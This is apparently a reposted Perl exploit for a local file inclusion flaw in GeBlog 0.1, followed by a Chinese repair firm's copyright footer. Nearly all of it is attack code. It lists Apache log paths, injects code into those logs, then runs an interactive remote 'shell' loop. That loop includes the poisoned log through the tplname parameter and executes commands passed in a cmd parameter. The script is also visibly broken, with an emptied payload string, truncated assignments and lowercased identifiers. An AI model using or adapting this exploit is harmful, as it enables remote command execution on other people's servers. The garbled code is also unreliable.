GeBlog 0.1 GLOBALS[tplname] Local File Inclusion
#!/usr/bin/perl
# geblog 0.1(globals[tplname])local file inclusion exploit
# d.script: http://sourceforge.net/projects/geblog/
# v.code: include "tpl/".$globals['tplname']."/html.func.inc.php";
# discovered & coded by : gold_m = [mahmood_ali]
# contact:hacker_@w.cn
# greetz to: tryag-team & 4lkasrgold3n-team & asbmay's group
# thanx : alk()mand()z & q8trojan
use io::socket;
use lwp::simple;
#ripped
@apache=(
"../../../../../var/log/httpd/access_log",
"../../../../../var/log/httpd/error_log",
"../apache/logs/error.log",
"../apache/logs/access.log",
"../../apache/logs/error.log",
"../../apache/logs/access.log",
"../../../apache/logs/error.log",
"../../../apache/logs/access.log",
"../../../../apache/logs/error.log",
"../../../../apache/logs/access.log",
"../../../../../apache/logs/error.log",
"../../../../../apache/logs/access.log",
"../logs/error.log",
"../logs/access.log",
"../../logs/error.log",
"../../logs/access.log",
"../../../logs/error.log",
"../../../logs/access.log",
"../../../../logs/error.log",
"../../../../logs/access.log",
"../../../../../logs/error.log",
"../../../../../logs/access.log",
"../../../../../etc/httpd/logs/access_log",
"../../../../../etc/httpd/logs/access.log",
"../../../../../etc/httpd/logs/error_log",
"../../../../../etc/httpd/logs/error.log",
"../../.. /../../var/www/logs/access_log",
"../../../../../var/www/logs/access.log",
"../../../../../usr/local/apache/logs/access_log",
"../../../../../usr/local/apache/logs/access.log",
"../../../../../var/log/apache/access_log",
"../../../../../var/log/apache/access.log",
"../../../../../var/log/access_log",
"../../../../../var/www/logs/error_log",
"../../../../../var/www/logs/error.log",
"../../../../../usr/local/apache/logs/error_log",
"../../../../../usr/local/apache/logs/error.log",
"../../../../../var/log/apache/error_log",
"../../../../../var/log/apache/error.log",
"../../../../../var/log/access_log",
"../../../../../var/log/error_log"
);
if (@argv < 3) {
print "
===============================================================
| geblog 0.1(globals[tplname])local file inclusion exploit |
| gold.pl [victim] /tpl/default/ (apachepath) |
| ex: gold.pl [victim] /tpl/default/ ../logs/error.log |
---------------------------------------------------------------
| greetz to: tryag-team & 4lkasrgold3n-team & asbmay's group |
| thanx : alk()mand()z & q8trojan |
===============================================================
";
exit();
}
$host=$argv[0];
$path=$argv[1];
$apachepath=$argv[2];
print "code is injecting in logfiles...\n";
$code="";
$socket = io::socket::inet->new(proto=>"tcp", peeraddr=>"$host", peerport=>"80") or die "connection failed.\n\n";
print $socket "get ".$path.$code." http/1.1\r\n";
print $socket "user-agent: ".$code."\r\n";
print $socket "host: ".$host."\r\n";
print $socket "connection: close\r\n\r\n";
close($socket);
print "write end to exit!\n";
print "if not working try another apache path\n\n";
print "[shell] ";$cmd =
while($cmd !~ "end") {
$socket = io::socket::inet->new(proto=>"tcp", peeraddr=>"$host", peerport=>"80") or die "connection failed.\n\n";
#now include parameter
print $socket "get ".$path."index.php?globals[tplname]=".$apache[$apachepath]."%00&cmd=$cmd http/1.1\r\n";
print $socket "host: ".$host."\r\n";
print $socket "accept: */*\r\n";
print $socket "connection: close\r\n\r\n";
while ($raspuns = <$socket>)
{
print $raspuns;
}
print "[shell] ";
$cmd =
}
- 文章作者: 福州军威计算机技术有限公司
军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
版权声明:原创作品,允许转载,转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。
TAG:
|
评论加载中...
|
